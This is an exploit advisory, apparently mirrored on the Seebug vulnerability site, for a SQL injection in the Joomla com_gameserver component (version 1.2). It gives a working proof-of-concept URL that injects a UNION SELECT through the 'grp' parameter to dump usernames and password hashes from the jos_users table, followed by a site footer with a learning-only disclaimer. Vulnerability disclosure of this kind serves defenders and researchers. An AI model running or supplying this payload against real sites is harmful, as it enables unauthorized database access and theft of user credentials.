# Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability # Date: 2010-01-22 # Author: B-Hunt3|2 # Software Link: http://joomlacode.org/gf/project/gameserver/frs/ # Version: 1.2 # CVE : N/A [~]>> ...[BEGIN ADVISORY]... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> TITLE: Joomla (com_gameserver) SQL Injection Vulnerability [~]>> LANGUAGE: PHP [~]>> DORK: N/A [~]>> RESEARCHER: B-HUNT3|2 [~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com [~]>> TESTED ON: Demo Site !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> DESCRIPTION: Input var "grp" is vulnerable to SQL code injection. [~]>> AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also. [~]>> RISK: High/Medium [~]>> IMPACT: Execute Arbitrary SQL queries !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> PROOF OF CONCEPT: [~]>> http://server/component/gameserver/?view=gameserver&grp=[SQL] [~]>> http://server/component/gameserver/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%23 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> ...[END ADVISORY]...
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论